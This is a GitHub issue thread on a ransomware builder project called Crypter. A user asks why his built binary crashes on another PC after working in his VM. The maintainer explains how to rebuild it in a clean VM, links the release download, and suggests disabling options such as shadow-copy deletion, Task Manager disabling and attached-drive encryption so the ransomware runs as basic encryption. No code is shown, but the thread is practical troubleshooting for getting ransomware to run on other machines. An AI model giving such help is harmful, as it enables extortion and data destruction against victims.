### ISSUE TITLE
u want to help me pls?

### ISSUE THREAD

**Issue by braga85** [sithis993/Crypter#51]
hello man, i have two errors, here 🆘  please help thanks.

Fatal Error : pyiboot01_bootstrap returned -1
or
Main script returned -1

**Comment by sithis993** [comment]
Hey sorry you're hitting these problems. I've never seen this particular error before, but when I have encountered this kind of stuff, it's usually because I'm building the ransomware on a machine which has a conflicting Python install, or conflicting libraries. It doesn't seem to play nicely if you've got an existing Python environment set up, with additional non-builtin libraries installed.

I'd suggest you create a new Virtual Machine with a fresh install of Windows and then download the release from https://github.com/sithis993/Crypter/releases/download/2.40/Crypter_distributable_2.40.zip

This should then work. Alternatively if you don't want to create a new VM, try cleaning you machine of any existing Python installations, then download that same release.

In either case, once you have it downloaded you'll need to install all of the dependencies (read the README.txt file for instructions) and then launch the builder to re-create the binary :-)

I suspect that using a Python virtual environment (virtualenv) would _probably_ also solve these kinds of problems, but I haven't tested it myself.

**Comment by braga85** [comment]
i created a vm (windows 7 ultimate x64) and installed all sofwares all of the dependencies ,builded successfuly. but when crypter run at vm, crypter works great and when i try the other pc ,got errors like this title:"Fatal Error"
error:"Main script returned -1"

**Comment by sithis993** [comment]
Ahhh I see! what OS is running on the machine which fails? I've got a feeling that one of the new features I created recently, like the Disable Task Manager option, isn't playing nicely. Some of the newer stuff was added quite quickly. Maybe try changing a few of the builder options so that it's a little more basic.

I'd say don't specify the UPX directory so that UPX isn't used. Also don't select the following options:
- Open GUI on Login
- Delete Shadow Copies
- Disable Task Manager
- Encrypt Attached Drives
- Make GUI Resizeable
- Always On Top

The operations it performs should then be limited to basic encryption. It will be interesting to see if this works :-)
